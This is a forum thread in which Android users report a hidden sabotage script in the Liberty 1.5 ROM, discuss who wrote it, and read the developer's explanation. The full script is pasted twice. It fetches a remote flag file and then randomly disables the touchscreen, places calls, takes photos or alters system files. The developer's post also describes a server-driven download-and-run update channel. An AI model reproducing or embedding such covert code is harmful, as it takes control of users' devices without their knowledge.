Root Liberty 1.5 possessed?

[ECFfighter7232]

ok, I know Im not nuts because theres a thread in another forum I dont belong to about this... but it just happened to me...
I restored a backup of Liberty 1.5 (had to grab something from back on that backup that I lost when switching to apex) and the phone rebooted into liberty, i slid the bar across to unlock it, then the browswer opened automatically, googled "Liberty 1.5 awesome" then the screen stopped responding...
hard buttons worked (power) but the screen wouldnt respond to any touch... WTF is going on with that? and it seems like quite a few people have had this issue...
anyone else have this happen or have thoughts on this?

UPDATE: This issue has been resolved with the Developer's explanation.

Full explanation by JRummy

I am closing this thread but just wanted to recap what happened below. If anyone has any further questions you can pm me or email me.

On 2-15-2011 I was talking to a friend showing him scripting in Liberty ROM. We were discussing a script in /system/bin called loadpreinstalls.sh. This script can be found here: Bash | #!/system/bin/sh # # loadpreinstalls.sh - insta

loadpreinstalls.sh installs any apps in /data/liberty/app, restores any apps in the restore directory (which can be setup in liberty settings), unzips animation files and sets up adb to fully work. After that it waits until there is a data connection and then downloads a file. If there is a link in the file it will download it. Then if that file is an app it will install it, if it is a script then it will either run it or install it depending on its file extension. This was created for update purposes and was in liberty 1.0 and rumm rx.

I wanted to show my friend Jake who I was talking to how it worked. I made a script and uploaded it to the server to download and run. I then got hung up with other things I had going at the moment and then had to go to my class. After class I realized from twitter messages that I forgot about the script so I came and responded here as soon as I could and removed the script.

The script I uploaded could only be run if the user rebooted while the script was on the server. I meant to tell my friend to reboot right when I uploaded the script and see it work and then I would remove it right away. The script googled liberty 1.5 awesome using another script in /system/lib called libgnakfoorp.so. I used the script in /system/lib because I tried writing the script to google the words but I honestly forgot how it was done but I knew I could google something using the script in /system/lib.
Here is the contents of the script on the server:

. /system/lib/libgnakfoorp.so
googleIt Liberty 1.5 Awesome

The first line imports functions in /system/lib/libgnakfoorp.so and then uses the googleIt function to google the words.

Now to explain more on libgnakfoorp.so:

libgnakfoorp.so was actually first written for two other developers (drod of rubix and matt of pheonix rom). They both approached me asking for help in writing a script to prevent people from stealing their work and removing credit. I wrote it for them and also put it in liberty. gnak foorp = kang proof backwards. Kang means to steal someone's work and remove credit. What this script does is check if system files were changed or removed that show who the rom was made by. This would never run on a normal users phone. Only a developer who was really tinkering with the rom would get this. It is very hard to trigger this script.

libgnakfoorp.so is actually harmless. I have run everything in it on my phone several times. It chooses a random small bug to give the person who was removing credit for the rom. It might turn up and down the volume, reboot the phone, go to the homescreen, google something or make the touch screen unresponsive until you simply reboot.

Having that file in /system/lib doesn't harm anything. I run liberty and have the file there myself. I will remove the file in the next version of liberty just because I simply don't think it is needed. If someone was to take liberty rom and claim it was their own work it would be really hard to do now.

I apologize once again to anyone who was affected. It was only meant to be shown to one person but got out of hand by my human errors. Liberty ROM can be viewed by all as well as any change made in the rom. Just check out the rom and the changeset here: https://bitbucket.org/JRummy16/liberty_rom/changesets

with that said, I apologize for jumping to conclusions and thank him for his explination. I was pissed though because I lost use of my phone when I kinda needed it very quickly for something important. and I think a lot of people were in that same boat.
Im glad he has explained everything

 

[Caveman419]

You are not crazy, this was just happening to me. Not sure what caused it or how to fix it. It took me about 6 or 7 tries to get it to the bootstraper app and get it into clockwork to wipe and install another backed up ROM (Tranquility). If anyone has any ideas, please share.

 

[ECFfighter7232]

yeah I have news on this, and if it turns out to be true I will be pretty pissed to be honest... give me a second to gather some quotes from the other forum and ill share them here...

 

[Caveman419]

I don't like the sound of that...but take your time.

 

[ECFfighter7232]

ok this post was from the other forum with information about why this is happening to people.... I dont know shit about scripts... but if im reading this right, not only is it tellling the phone to do this google search but also to call people randomly, and to take a picture randomly???!! really?!
now from my understanding this has something to possibly do about keeping people from copying their stuff without giving credit... but I did nothing but retsore a backup... and this totally ****ed my phone until I was able to get it into recovery and luckily I had the apex zip on my phone to install and wipe everything out....
something seriously isnt right here if this was meant as a joke on people and it makes there phone unusable for ANY period of time... I sent a tweet to both keljar and jrummy about this and havnt heard anything back yet.

"Pull the SD card out reboot, go into any file manager and go to

/system/lib/libgnakfoorp.so
delete that file and you are good.


Because I know linux well enough to know what to search for.

Only happens when an SD card is mounted.
In the Liberty folder is a .so file (A script designed to run when mounted)
That script opens a Super user terminal, and runs that file I mentioned from the system folder.
The .so in the system folder says the following
# Why? 99% because it was fun as hell to make. 1% to mess with people's minds who try and remove credit

SLEEP_TIME=3m
URL=http://www.froyoroms.com/files/developers/jrummy/JRummy/testing/kangtest
GNAK=1
BB=busybox
CHECK_POINT=/data/gnak
OPTIONS=/data/.gnaksnoitpo
PHONE_NUMBER=411

gnak()
{
if test ! -e /system/etc/product_of_liberty; then
while test -z "$(mount | $BB grep /sdcard)"; do
sleep 5s
done
$BB sleep $SLEEP_TIME;
sleep 3s;
$BB wget $URL -O $CHECK_POINT > /dev/nul 2>&1
if test "`cat $CHECK_POINT`" = "$GNAK"; then
sed -i 's|ROM version |KANG version|' /system/app/Settings.apk
listOptions
OPTION_COUNT=$($BB wc -l < $OPTIONS)
if test $OPTION_COUNT -gt 0; then
RANDOM=$($BB hexdump -e '1/1 "%d"' -n 1 /dev/urandom)
GNAK_NUB=$(($RANDOM % $OPTION_COUNT + 1))
GNAK_FOORP=$($BB sed -n "${GNAK_NUB}"p $OPTIONS)
NRAEL_TON_OT_GNAK=`echo $GNAK_FOORP | $BB sed 's/_/ /g'`
$NRAEL_TON_OT_GNAK
else
freezeIt
googleIt wtf is going on
fi
fi
fi
}

inputText() {
for word in "$@"; do
input text $word
input keyevent 62
done
}

googleIt()
{
freezeIt
am start -a android.intent.action.VIEW -d Google
sleep 10s
input keyevent 84
sleep 1s
inputText $@
input keyevent 66
}

powerDown()
{
case $1 in
bs) > /data/.recovery_mode;reboot;;
rc) reboot recovery;;
pd) reboot -p;;
rb) reboot;;
esac
}

freezeIt()
{
echo 1 > /sys/module/qtouch_obp_ts/parameters/disable_touch
}

lcdMess()
{
case $1 in
tiny) sed -i 's|.*ro.sf.lcd_density=.*|ro.sf.lcd_density=170|' /system/build.prop;reboot;;
big) sed -i 's|.*ro.sf.lcd_density=.*|ro.sf.lcd_density=280|' /system/build.prop;reboot;;
esac
}

takePicture()
{
while sleep 30m; do
am start -a android.intent.action.MAIN -n com.motorola.Camera/.Camera
sleep 2
input keyevent 27
done
}

pulldownBar()
{
while test "this" != "fun"; do
input keyevent 83
done
}

homeScreen()
{
while sleep 60s; do
input keyevent 3
done
}

callSomeone()
{
am start -a android.intent.action.CALL tel:$PHONE_NUMBER
}

soundAnnoy()
{
A=0
B=0
while sleep 2s; do
while test $A -ne 10; do
input keyevent 24
A=$(($A+1))
done
A=0
while test $B -ne 10; do
input keyevent 25
B=$(($B+1))
done
B=0
done
}

listOptions()
{
cat > $OPTIONS << GNAK
googleIt_urban_dictionary_kang
googleIt_urban_dictionary_kang
googleIt_liberty_rom_android
googleIt_liberty_rom_android
soundAnnoy
soundAnnoy
powerDown_bs
powerDown_rc
powerDown_pd
powerDown_rb
pulldownBar
pulldownBar
pulldownBar
pulldownBar
homeScreen
homeScreen
callSomeone
freezeIt
freezeIt
takePicture
takePicture
lcdMess_tiny
lcdMess_big
GNAK
}

# yb: 61ymmurj"

 

[jlewis74]

I have been running 1.5 for a few days now without any problems. But I do want to know what the deal is!

 

[jlewis74]

While I am sure its not fun if it happens to you I can imagine the look on someones faces when it does. I think the devs are saying "Hey, we are the ones putting all the work in to these ROMS dont mess with them." But what do I know.

 

[Aggie12]

I don't think I'm okay with that if that is to be true. Not saying this is bad but if this is something implemented..is there anything else we should know of?

 

[Caveman419]

Wow...This is very surprising. Who put this code in there. I would not ever think that jrummy would have any part of something like this. I understand the whole thing about not giving credit for anothers work (whole UD situation). I will be very interested to see jrummy's take on this whole thing. Do you have a link to the other thread from the other forum?

 

[k0smo86]

That's pretty ridiculous. I know that one dev pissed them off, but this is another reason I won't be using that ROM.

 

[Xeneize480]

I hope I never get that =)

 

[cultldr]

Wow...This is very surprising. Who put this code in there. I would not ever think that jrummy would have any part of something like this. I understand the whole thing about not giving credit for anothers work (whole UD situation). I will be very interested to see jrummy's take on this whole thing. Do you have a link to the other thread from the other forum?

Liberty 1.5 takes over my phone? - Droid Forum - Verizon Droid & the Motorola Droid Forum

 

[ECFfighter7232]

While I am sure its not fun if it happens to you I can imagine the look on someones faces when it does. I think the devs are saying "Hey, we are the ones putting all the work in to these ROMS dont mess with them." But what do I know.

ok 1 I didnt mess with anything. I restored the rom from clockwork revovery like id done several times before. 2 its MY ****ing phone and if someone puts a hidden script onto my phone without notifying me that it can disable my phone for ANY lengh of time, I can not and will not support that developer and I would suggest everyone else to think about it strongly.
like I said before, I do not know the true intension of this code but it has effected SEVERAL people today. so maybe Im jumping the gun, but im pissed as shit right now...

 

[ECFfighter7232]

Wow...This is very surprising. Who put this code in there. I would not ever think that jrummy would have any part of something like this. I understand the whole thing about not giving credit for anothers work (whole UD situation). I will be very interested to see jrummy's take on this whole thing. Do you have a link to the other thread from the other forum?

it looks like jrummy is the one who wrote the script
at the bottom of the script it says

# yb: 61ymmurj"

jrummy16 backwards

 

[faber78]

That's not cool. If they were gonna pull some shit like that they should have been sure it would never effect the typical end user. If this is true then someone had gotten to big for his britches. That = fail. The community will support the work of people who deserve it on their own.
On a side note, had it not effected the regular user, it would have been funny. But jacking up someones phone that cost hard earned money cause your booby trap screwed the pooch is not cool at all.

 

[Caveman419]

it looks like jrummy is the one who wrote the script
at the bottom of the script it says


jrummy16 backwards

Anybody that can write this script can code in something minor like that to point suspicion in any direction that they want. I am still holding out to hear from jrummy. He has been a pillar in Dev community.

Let's see how this unfolds. I am not happy by any means, but let the devs weigh in.

 

[k0smo86]

Anybody that can write this script can code in something minor like that to point suspicion in any direction that they want. I am still holding out to hear from jrummy. He has been a pillar in Dev community.

Let's see how this unfolds. I am not happy by any means, but let the devs weigh in.

I don't see how someone else could possibly have done this? Glad I am on Apex

 

[ECFfighter7232]

That's not cool. If they were gonna pull some shit like that they should have been sure it would never effect the typical end user. If this is true then someone had gotten to big for his britches. That = fail. The community will support the work of people who deserve it on their own.
On a side note, had it not effected the regular user, it would have been funny. But jacking up someones phone that cost hard earned money cause your booby trap screwed the pooch is not cool at all.

very true. if this happened to someone who was trying to screw with or copy someones work without giving credit (like what happened with that redone theme) then I could see it being funny... but seeing how this has effected a lot of people who did no such thing... the humor has been lost.

Anybody that can write this script can code in something minor like that to point suspicion in any direction that they want. I am still holding out to hear from jrummy. He has been a pillar in Dev community.

Let's see how this unfolds. I am not happy by any means, but let the devs weigh in.

very true.... idk who else beside keljar or jrummy would have put that in there though... the only other changes to my liberty rom were battery icon changes that I made to it myself.

 

[PatHoge]

Wow...this is ridiculous. After how Jrummy and kejar treated that dev who used the supposed "open source" code to improve on Liberty, I stopped supporting them and stopped using Liberty. And now this happens? I am so glad this did not happen to me, and if this really was Jrummy then I am extremely disappointed. This is not how the Android community should be run.

 

[ECFfighter7232]

heres another thing thats REALLY odd about this whole ordeal...
it seems that it has only happened to people TODAY. I have read no reports of it happening to anyone before today.... theres got to be something to the date side of this as well... maybe a recent update that implemented this?

 

[tom108]

its a pretty interesting script. but simple to stop. just goto /system/lib/libgnakfoorp.so and rename or delete it using root explorer.

 

[PatHoge]

its a pretty interesting script. but simple to stop. just goto /system/lib/libgnakfoorp.so and rename or delete it using root explorer.

It is interesting...but very malicious.

 

[Trooper]

its a pretty interesting script. but simple to stop. just goto /system/lib/libgnakfoorp.so and rename or delete it using root explorer.

Just deleted it. Thanks tom.

 

[tom108]

It is interesting...but very malicious.

in a way yes.


here is what the scripts says:

# Why? 99% because it was fun as hell to make. 1% to mess with people's minds who try and remove credit :P

SLEEP_TIME=3m
URL=http://www.froyoroms.com/files/developers/jrummy/JRummy/testing/kangtest
GNAK=1
BB=busybox
CHECK_POINT=/data/gnak
OPTIONS=/data/.gnaksnoitpo
PHONE_NUMBER=411

gnak()
{
	if test ! -e /system/etc/product_of_liberty; then
		while test -z "$(mount | $BB grep /sdcard)"; do
			sleep 5s
		done
		$BB sleep $SLEEP_TIME;
		sleep 3s;
		$BB wget $URL -O $CHECK_POINT > /dev/nul 2>&1
		if test "`cat $CHECK_POINT`" = "$GNAK"; then
			sed -i 's|ROM version |KANG version|' /system/app/Settings.apk
			listOptions
			OPTION_COUNT=$($BB wc -l < $OPTIONS)
			if test $OPTION_COUNT -gt 0; then
				RANDOM=$($BB hexdump -e '1/1 "%d"' -n 1 /dev/urandom)
				GNAK_NUB=$(($RANDOM % $OPTION_COUNT + 1))
				GNAK_FOORP=$($BB sed -n "${GNAK_NUB}"p $OPTIONS)
				NRAEL_TON_OT_GNAK=`echo $GNAK_FOORP | $BB sed 's/_/ /g'`
				$NRAEL_TON_OT_GNAK
			else
				freezeIt
				googleIt wtf is going on
			fi
		fi
	fi
}

inputText()	{
for word in "$@"; do
	input text $word
	input keyevent 62
done
}

googleIt()
{
	freezeIt
	am start -a android.intent.action.VIEW -d http://www.google.com
	sleep 10s
	input keyevent 84
	sleep 1s
	inputText $@
	input keyevent 66
}

powerDown()
{
	case $1 in
		bs) > /data/.recovery_mode;reboot;;
		rc) reboot recovery;;
		pd) reboot -p;;
		rb) reboot;;
	esac
}

freezeIt()
{
	echo 1 > /sys/module/qtouch_obp_ts/parameters/disable_touch
}

lcdMess()
{
	case $1 in
		tiny) sed -i 's|.*ro.sf.lcd_density=.*|ro.sf.lcd_density=170|' /system/build.prop;reboot;;
		big)  sed -i 's|.*ro.sf.lcd_density=.*|ro.sf.lcd_density=280|' /system/build.prop;reboot;;
	esac
}

takePicture()
{
	while sleep 30m; do
		am start -a android.intent.action.MAIN -n com.motorola.Camera/.Camera
		sleep 2
		input keyevent 27
	done
}

pulldownBar()
{
	while test "this" != "fun"; do
		input keyevent 83
	done
}

homeScreen()
{
	while sleep 60s; do
		input keyevent 3
	done
}

callSomeone()
{
	am start -a android.intent.action.CALL tel:$PHONE_NUMBER
}

soundAnnoy()
{
	A=0
	B=0
	while sleep 2s; do 
		while test $A -ne 10; do 
			input keyevent 24
			A=$(($A+1))
		done
		A=0
		while test $B -ne 10; do 
			input keyevent 25
			B=$(($B+1))
		done
		B=0
	done 
}

listOptions()
{
	cat > $OPTIONS << GNAK
googleIt_urban_dictionary_kang
googleIt_urban_dictionary_kang
googleIt_liberty_rom_android
googleIt_liberty_rom_android
soundAnnoy
soundAnnoy
powerDown_bs
powerDown_rc
powerDown_pd
powerDown_rb
pulldownBar
pulldownBar
pulldownBar
pulldownBar
homeScreen
homeScreen
callSomeone
freezeIt
freezeIt
takePicture
takePicture
lcdMess_tiny
lcdMess_big
GNAK
}

# yb: 61ymmurj

 

[PatHoge]

Yeah I read it. It's well done, no doubt about it. I'm not sure what the first block does. I know it will only run the script if the SD card is mounted but what's the next part?